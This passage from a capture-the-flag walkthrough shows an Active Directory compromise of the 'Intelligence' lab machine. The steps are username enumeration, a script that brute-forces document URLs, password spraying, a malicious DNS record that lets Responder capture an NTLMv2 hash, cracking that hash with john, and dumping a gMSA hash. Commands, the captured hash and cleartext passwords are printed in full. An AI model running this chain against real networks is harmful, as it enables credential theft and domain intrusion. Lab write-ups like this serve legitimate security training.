File Inode Change Date/Time     : 2021:07:05 03:32:27+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams
root@Raj:~/HTB/Intelligence$

Looks like we have two usernames Jose.Williams and William.Lee so let’s create a wordlist with different combination from their names and then brute it with kerbrute.

Kerberos

Thinking about the wordlist I came up with this wordlist below.

Administrator
Guest
William
Jose.Williams 
William.Lee
Jwilliams
JWilliams
WLee
Wlee
LWilliams
Lwilliams
WJose
Wjose
wJose
wjose
lWilliams
lwilliams
wlee
wLee
jWilliams
jwilliams

In this case you don’t need to create this wordlist cause the author name is one of the usernames but in Real like scenario or the in some difficult CTF you might need to create the wordlist as above. Let’s move on and try kerbrute on the AD.

root@Raj:~/HTB/Intelligence$ ~/Git/kerbrute/dist/kerbrute userenum --dc intelligence.htb -d intelligence.htb user.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (1ad284a) - 07/05/21 - Ronnie Flathers @ropnop

2021/07/05 03:37:21 >  Using KDC(s):
2021/07/05 03:37:21 >   intelligence.htb:88

2021/07/05 03:37:22 >  [+] VALID USERNAME:       William.Lee@intelligence.htb
2021/07/05 03:37:22 >  [+] VALID USERNAME:       Administrator@intelligence.htb
2021/07/05 03:37:22 >  Done! Tested 21 usernames (2 valid) in 0.804 seconds

So now we have two users before bruting the password let’s try and check for some low hanging fruits like GetNpuser. Got nothing from that so I though that there could be something else so I went on to check PDF’s.

Web

So I checked the naming of PDF is using the date and then followed by upload. so I tried to brute all the dates to get if there are anymore PDF’s. The below script will create a new PDF directory and download all pdf in that directory.

#!/usr/bin/python3

import requests
import os

url = 'http://intelligence.htb/documents/'

for i in range(2020,2022):
	for j in range(1,13):
		for k in range(1,31):
			date = f'{i}-{j:02}-{k:02}-upload.pdf'
			r = requests.get(url+date)
			#print (r.text)
			if (r.status_code == 200):
				print (date)
				#text = r.text
				os.system('mkdir pdf')
				os.system(f'wget {url}{date} -O pdf/{date}')

Now as the nummber of PDF files was more I wrote another python script to extract the usernames.

#!/usr/bin/python3

from pwn import *

io = process('/bin/sh')
io.sendline('ls -al pdf/')
lst = io.recvrepeat(1).decode().strip().split('\n')
files = []
for i in range(3,len(lst)):
	tmp = lst[i].split(' ')
	files.append(tmp[9])
#print (files)
f = open('users.txt','w')
for i in files:
	io.sendline(f'exiftool pdf/{i}')
	tmp = (io.recvrepeat(1).decode().strip().split(': '))
	f.write(tmp[-1] + '\n')
	print (tmp[-1])

f.close()

And it will create users.txt for you. now after getting users.txt you can retry NPUsers.py but it won’t help so let’s dig more into PDF. Now searching for password in pdf I wrote this simple python script to make my job easy.

#!/usr/bin/python3

from pdfminer.high_level import extract_text

files = ['2020-01-01-upload.pdf', '2020-01-02-upload.pdf', '2020-01-04-upload.pdf', '2020-01-10-upload.pdf', '2020-01-20-upload.pdf', '2020-01-22-upload.pdf', '2020-01-23-upload.pdf', '2020-01-25-upload.pdf', '2020-01-30-upload.pdf', '2020-02-11-upload.pdf', '2020-02-17-upload.pdf', '2020-02-23-upload.pdf', '2020-02-24-upload.pdf', '2020-02-28-upload.pdf', '2020-03-04-upload.pdf', '2020-03-05-upload.pdf', '2020-03-12-upload.pdf', '2020-03-13-upload.pdf', '2020-03-17-upload.pdf', '2020-03-21-upload.pdf', '2020-04-02-upload.pdf', '2020-04-04-upload.pdf', '2020-04-15-upload.pdf', '2020-04-23-upload.pdf', '2020-05-01-upload.pdf', '2020-05-03-upload.pdf', '2020-05-07-upload.pdf', '2020-05-11-upload.pdf', '2020-05-17-upload.pdf', '2020-05-20-upload.pdf', '2020-05-21-upload.pdf', '2020-05-24-upload.pdf', '2020-05-29-upload.pdf', '2020-06-02-upload.pdf', '2020-06-03-upload.pdf', '2020-06-04-upload.pdf', '2020-06-07-upload.pdf', '2020-06-08-upload.pdf', '2020-06-12-upload.pdf', '2020-06-14-upload.pdf', '2020-06-15-upload.pdf', '2020-06-21-upload.pdf', '2020-06-22-upload.pdf', '2020-06-25-upload.pdf', '2020-06-26-upload.pdf', '2020-06-28-upload.pdf', '2020-06-30-upload.pdf', '2020-07-02-upload.pdf', '2020-07-06-upload.pdf', '2020-07-08-upload.pdf', '2020-07-20-upload.pdf', '2020-07-24-upload.pdf', '2020-08-01-upload.pdf', '2020-08-03-upload.pdf', '2020-08-09-upload.pdf', '2020-08-19-upload.pdf', '2020-08-20-upload.pdf', '2020-09-02-upload.pdf', '2020-09-04-upload.pdf', '2020-09-05-upload.pdf', '2020-09-06-upload.pdf', '2020-09-11-upload.pdf', '2020-09-13-upload.pdf', '2020-09-16-upload.pdf', '2020-09-22-upload.pdf', '2020-09-27-upload.pdf', '2020-09-29-upload.pdf', '2020-09-30-upload.pdf', '2020-10-05-upload.pdf', '2020-10-19-upload.pdf', '2020-11-01-upload.pdf', '2020-11-03-upload.pdf', '2020-11-06-upload.pdf', '2020-11-10-upload.pdf', '2020-11-11-upload.pdf', '2020-11-13-upload.pdf', '2020-11-24-upload.pdf', '2020-11-30-upload.pdf']
#keywords = ['user','username','pass','password']
keywords = 'user'

for i in files:
	text = extract_text('pdf/'+i)
	if(keywords in text):
		print (i)
		print (text)

So this will give you the following output.

root@Raj:~/HTB/Intelligence$ chmod +x script.py
root@Raj:~/HTB/Intelligence$ ./script.py 
2020-06-04-upload.pdf
New Account Guide

Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.

So now we have default password so let’s try and spray that password at our username I tried kerbrute but didn’t yeild anything then I tried crackmapexec.

Crackmapexec

root@Raj:~/HTB/Intelligence$ crackmapexec smb <MACHINE IP> -u users.txt -p NewIntelligenceCorpUser9876
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[34m[*][0m Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\User9876:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[31m[-][0m intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
[1m[34mSMB[0m         10.129.80.199   445    DC               [1m[32m[+][0m intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 [1m[33m[0m

Look like we have password for Tiffany.Molina

smbmap

[\] Working on it...
[+] IP: intelligence.htb:445	Name: unknown                                           
[-] Working on it...
                                
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	.\IPC$\*
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 23:58:45 1600	lsass
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	scerpc
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-39c-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	epmapper
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-1b8-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	eventlog
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-394-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	atsvc
	fr--r--r--                4 Sun Dec 31 23:58:45 1600	wkssvc
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-258-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-4e8-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-258-1
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	RpcProxy\49677
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	01c597a227e270af
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	RpcProxy\593
	fr--r--r--                5 Sun Dec 31 23:58:45 1600	srvsvc
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	efsrpc
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	netdfs
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	vgauth-service
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-240-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	W32TIME_ALT
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	cert
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-9f0-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-a7c-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-a50-0
	IT                                                	READ ONLY	
	.\IT\*
	dr--r--r--                0 Mon Apr 19 01:50:58 2021	.
	dr--r--r--                0 Mon Apr 19 01:50:58 2021	..
	fr--r--r--             1046 Mon Apr 19 01:50:58 2021	downdetector.ps1
	NETLOGON                                          	READ ONLY	Logon server share 
	.\NETLOGON\*
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	.
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	..
	SYSVOL                                            	READ ONLY	Logon server share 
	.\SYSVOL\*
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	.
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	..
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	intelligence.htb
	Users                                             	READ ONLY	
	.\Users\*
	dw--w--w--                0 Mon Apr 19 02:20:26 2021	.
	dw--w--w--                0 Mon Apr 19 02:20:26 2021	..
	dr--r--r--                0 Mon Apr 19 01:18:39 2021	Administrator
	dr--r--r--                0 Mon Apr 19 04:16:30 2021	All Users
	dw--w--w--                0 Mon Apr 19 03:17:40 2021	Default
	dr--r--r--                0 Mon Apr 19 04:16:30 2021	Default User
	fr--r--r--              174 Mon Apr 19 04:15:17 2021	desktop.ini
	dw--w--w--                0 Mon Apr 19 01:18:39 2021	Public
	dr--r--r--                0 Mon Apr 19 02:20:26 2021	Ted.Graves
	dr--r--r--                0 Mon Apr 19 01:51:46 2021	Tiffany.Molina

We have access to few of the shares so let’s try and access those.

User.txt

root@Raj:~/HTB/Intelligence$ smbclient  //intelligence.htb/Users -U 'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password: NewIntelligenceCorpUser9876 Try "help" to get a list of possible commands. smb: \> cd Tiffany.Molina\Desktop\ smb: \Tiffany.Molina\Desktop\> get user.txt  getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

Now you have user.txt

PrivESC

Enumeration

The share that looked interesting to me was IT, so let’s look into that.

root@Raj:~/HTB/Intelligence$ smbclient  //intelligence.htb/IT -U 'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password: NewIntelligenceCorpUser9876 Try "help" to get a list of possible commands. smb: \> ls  . D 0 Mon Apr 19 01:50:55 2021  .. D 0 Mon Apr 19 01:50:55 2021  downdetector.ps1 A 1046 Mon Apr 19 01:50:55 2021  3770367 blocks of size 4096. 1454216 blocks available smb: \> get downdetector.ps1  getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec) smb: \> 

Looks like we have a powershell script let’s explore it.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

Looks like we have the cronjob kind of thing running every five minutes we can see that it makes a request to webserver if we can bypass the check for validation which will be pretty easy as it uses web* as validation so not much problem there. Now so I think that if we can add a dns in the record we can get the Ted.Graves hash using responder. Basically the login behind this is simple we add the dns record and then the Ted will see if that record responds back or not and as soon as Ted checks that record we will get his hash in responder.

root@Raj:~/HTB/Intelligence$ sudo python /usr/share/responder/Responder.py -I tun0 -A                                                                         
                                         __                                                                                                                           
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.                                                                                                              
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                                                                                              
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                                                                                                
                   |__|                                                                                                                                               
 
           NBT-NS, LLMNR & MDNS Responder 3.0.2.0                 
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C 
/!\ Warning: files/AccessDenied.html: file not found
/!\ Warning: files/BindShell.exe: file not found                                                                                                                      
 
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
	
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
	POP3 server                [ON] 
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.14]
    Challenge set              [1122334455667788]
    Don't Respond To Names     ['ISATAP']



[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<--SNIP--->).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.14) is not on the same subnet than the DNS server (<---SNIP---->).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events..

Now let’s try and use dnstool to deal with DNS records. you can find the dnstool over here. https://github.com/dirkjanm/krbrelayx.git You can install it like below.

root@Raj:~/HTB/Intelligence$ git clone https://github.com/dirkjanm/krbrelayx.git
Cloning into 'krbrelayx'...
remote: Enumerating objects: 98, done.
remote: Total 98 (delta 0), reused 0 (delta 0), pack-reused 98
Unpacking objects: 100% (98/98), 65.74 KiB | 474.00 KiB/s, done.
root@Raj:~/HTB/Intelligence$ cd krbrelayx/
root@Raj:~/HTB/Intelligence/krbrelayx$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md
root@Raj:~/HTB/Intelligence/krbrelayx$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d <YOUR IP> <MACHINE IP>
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/root/HTB/Intelligence/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
root@Raj:~/HTB/Intelligence/krbrelayx$

Now we our record in DNS so let’s wait for hash in responder. Note this may take up to 5 mins so be patient.

[+] Listening for events...
[HTTP] NTLMv2 Client   : <MACHINE IP>
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:1122334455667788:C8B5809269803AA43B885BE5C452F7CC:0101000000000000753D23B43271D701F88971DBE2AC9A9D000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000005390A83A090299C14BEA2A5D14212C5258BF7161A4DB11E0F11AAEC4B7116CC80A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

Now we have the hash for Ted.Graves let’s try and crack it. Over here I have used john you can also use hashcat for the same and there are also online cracker if you prefer that.

root@Raj:~/HTB/Intelligence/krbrelayx$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy         (Ted.Graves)
1g 0:00:00:23 DONE (2021-07-05 03:40) 0.04170g/s 450978p/s 450978c/s 450978C/s Mrz.deltasigma..Mr BOB
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Now we have the password for Ted.Graves So let’s enumerate the ldap as we already know we don’t have much on share. I got this tool from the link https://github.com/micahvandeusen/gMSADumper

root@Raj:~/HTB/Intelligence/gMSADumper$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

we have a hash but unfortunately it’s not in rockyou.txt

root@Raj:~/HTB/Intelligence/gMSADumper$ sudo john new --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2021-07-05 03:43) 0g/s 3431Kp/s 3431Kc/s 3431KC/s      markinho..*7¡Vamos!
Session completed

So now the other option is to get the kerberos ticket using that hash. Famously or INFamously known as silver ticket attack on AD. So you can search Silver Ticket attack on Active Directory to learn more. Let’s try that.

